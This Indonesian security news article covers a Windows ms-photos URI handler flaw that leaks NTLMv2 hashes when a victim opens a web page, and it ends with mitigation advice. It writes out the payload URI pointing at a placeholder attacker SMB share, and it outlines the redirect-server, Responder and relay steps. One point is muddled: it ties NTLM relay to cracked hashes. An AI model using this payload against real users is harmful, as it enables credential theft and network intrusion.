Sebuah vulnerability 0-day yang mengejutkan baru saja terungkap dalam ekosistem Microsoft Windows — celah keamanan yang memungkinkan pembocoran NTLM hash dari browser hanya dengan satu klik. Vulnerability ini, yang ditemukan oleh researcher Ruben Enkaoua dan dipublikasikan di GitHub dengan nama ms-photos_NTLM_Leak, mengeksploitasi cara kerja URI scheme ms-photos pada aplikasi Microsoft Photos. Dengan memanfaatkan parameter fileName yang menerima UNC path, seorang attacker bisa memaksa korban membuka Microsoft Photos langsung dari browser, yang kemudian secara otomatis mengirimkan NTLMv2-SSP hash korban ke server yang dikontrol oleh attacker.
Yang membuat vulnerability ini sangat kritis adalah kesederhanaan serangannya — korban hanya perlu membuka satu halaman web dan Microsoft Photos akan terbuka secara otomatis. Tidak ada download yang perlu dilakukan, tidak ada file yang perlu dijalankan, dan tidak ada permission yang perlu diberikan. Cukup dengan membuka URL yang sudah dikonfigurasi, proses photos.exe akan diluncurkan dengan parameter UNC path yang menunjuk ke server attacker, dan dalam hitungan milidetik, NTLMv2-SSP challenge-response hash korban akan dikirim ke attacker. Ini adalah jenis vulnerability yang sangat berbahaya karena mengeksploitasi trusted OS component dan memerlukan interaksi minimal dari korban.
Mekanisme teknis di balik vulnerability ini cukup elegan dalam kesederhanaannya. URI scheme ms-photos:viewer?fileName= dirancang untuk membuka file gambar lokal dari Windows Explorer atau browser. Namun parameter fileName ini tidak memvalidasi apakah path yang diberikan adalah path lokal yang valid atau UNC path yang mengarah ke server remote. Ketika UNC path seperti \\attacker-IP\share\image.png diberikan sebagai parameter, Windows akan mencoba mengakses share tersebut melalui protokol SMB untuk memuat gambar. Proses ini memicu autentikasi NTLMv2-SSP ke server attacker, yang kemudian menerima dan menyimpan challenge-response hash korban.
Untuk melakukan serangan ini, attacker memerlukan tiga komponen: sebuah script Python yang berfungsi sebagai web server dengan redirect 302 ke URI ms-photos:viewer?fileName=\\attacker-IP\share\image.png, sebuah SMB server untuk menerima koneksi NTLM (bisa menggunakan impacket-smbserver atau Responder), dan korban yang membuka halaman web attacker. Script server berfungsi sebagai perantara — ketika korban mengakses URL attacker, server melakukan redirect 302 ke URI ms-photos dengan UNC path. Browser korban kemudian membuka Microsoft Photos, yang mencoba memuat gambar dari UNC path tersebut, dan mengirimkan NTLMv2-SSP hash dalam prosesnya.
Salah satu aspek paling mengkhawatirkan dari vulnerability ini adalah potensinya untuk dikombinasikan dengan teknik supply chain attack. Karena redirection bisa dilakukan dari website yang sudah dikompromi, attacker bisa menanamkan redirect ke ms-photos URI di situs-situs populer yang sering dikunjungi oleh target. Setiap pengunjung yang menggunakan Chrome, Edge, atau browser lain yang mendukung ms-photos URI scheme akan secara otomatis membuka Microsoft Photos dan mengirimkan NTLM hash mereka. Dalam skenario enterprise, ini berarti satu website yang terinfeksi bisa menjadi titik awal kompromi massal terhadap seluruh user di jaringan internal.
Integrasi dengan Responder menambahkan dimensi lain yang sangat berbahaya. Responder adalah tool yang mendengarkan dan merespons request LLMNR (Link-Local Multicast Name Resolution) dan mNBT-NS di jaringan lokal. Dalam skenario ini, attacker bisa menjalankan Responder terlebih dahulu, lalu menjalankan script redirect. Setiap domain yang tidak bisa di-resolve oleh DNS lokal akan menghasilkan request LLMNR, yang kemudian diintersep oleh Responder dan diarahkan ke script redirect. Artinya, attacker bahkan tidak perlu menarget korban secara spesifik — cukup menjalankan Responder di jaringan yang sama dan menunggu korban secara alami melakukan request nama host yang tidak terdaftar.
Yang menambah keparahan situasi, Microsoft secara resmi menolak untuk mengakui vulnerability ini sebagai security issue yang layak mendapatkan CVE. Ruben Enkaoua melaporkan temuannya melalui program responsible disclosure Microsoft, namun Microsoft memutuskan bahwa perilaku ini adalah by design dan bukan vulnerability. Keputusan ini menuai kritik dari komunitas keamanan karena URI scheme ms-photos secara eksplisit menerima input dari browser tanpa validasi UNC path — sebuah pola yang secara universal dianggap sebagai kelemahan keamanan dalam konteks URI handler lainnya. Ketidakhadiran CVE berarti tidak akan ada patch resmi dari Microsoft, dan vulnerability ini akan tetap terbuka untuk eksploitasi selamanya.
Dampak terhadap lingkungan enterprise sangat signifikan. Di jaringan korporat yang mengandalkan NTLM authentication (yang masih sangat umum di Indonesia), NTLMv2-SSP hash yang berhasil diintersep bisa digunakan untuk offline cracking menggunakan tool seperti hashcat atau john the ripper. Jika password user relatif lemah, hash ini bisa di-crack dalam waktu singkat. Lebih berbahaya lagi, hash NTLM yang sudah di-crack bisa digunakan untuk NTLM relay attacks — teknik di mana attacker merelay autentikasi NTLM ke service lain di jaringan (seperti SMB, LDAP, atau WinRM) tanpa perlu mengetahui password asli. Dalam lingkungan Active Directory, NTLM relay bisa digunakan untuk escalasi privilege yang sangat serius.
Rekomendasi mitigasi untuk vulnerability ini meliputi beberapa langkah yang harus segera diimplementasikan. Pertama, blokir outbound SMB traffic (port 445) melalui firewall jaringan — ini adalah mitigasi paling efektif karena mencegah Microsoft Photos mengirimkan NTLM hash ke server external. Kedua, implementasikan Extended Protection for Authentication (EPA) pada service-service internal yang mendukung NTLM. Ketiga, pertimbangkan untuk mengaktifkan SMB signing dan SMB encryption di seluruh endpoint menggunakan Group Policy. Keempat, tingkatkan awareness user tentang risiko membuka link dari sumber yang tidak dikenal. Kelima, pertimbangkan untuk beralih dari NTLM ke Kerberos authentication di seluruh infrastruktur Active Directory.
Analisa Retasan
Vulnerability ms-photos NTLM Leak menunjukkan sebuah realitas yang mengkhawatirkan: URI handler di Windows masih merupakan attack surface yang sangat luas dan kurang diproteksi. Microsoft telah beberapa kali mendapat kritik serupa terkait URI scheme handling — termasuk vulnerability serupa pada
ms-msdt(Follina) danms-mscx. Pola yang berulang ini menunjukkan bahwa Microsoft perlu melakukan audit menyeluruh terhadap seluruh URI scheme yang didaftarkan oleh Windows, khususnya yang menerima parameter dari browser tanpa sanitasi yang memadai.Dari sudut pandang pertahanan Indonesia, keputusan Microsoft untuk tidak mengeluarkan CVE berarti pertahanan sepenuhnya bergantung pada mitigasi jaringan dan konfigurasi sistem. Organisasi Indonesia yang masih mengandalkan NTLM authentication harus segera mempertimbangkan migrasi ke Kerberos atau setidaknya mengaktifkan Extended Protection for Authentication pada semua service yang kritis. Selain itu, aturan firewall yang memblokir outbound SMB traffic harus menjadi standar di setiap environment — ini bukan hanya melindungi dari vulnerability ini, tetapi juga dari banyak teknik serangan lain yang memanfaatkan SMB outbound.
Sumber: GitHub – ms-photos_NTLM_Leak | Penulis: Ruben Enkaoua | Stars: 209 | Forks: 31 | Tidak ada CVE yang dikeluarkan oleh Microsoft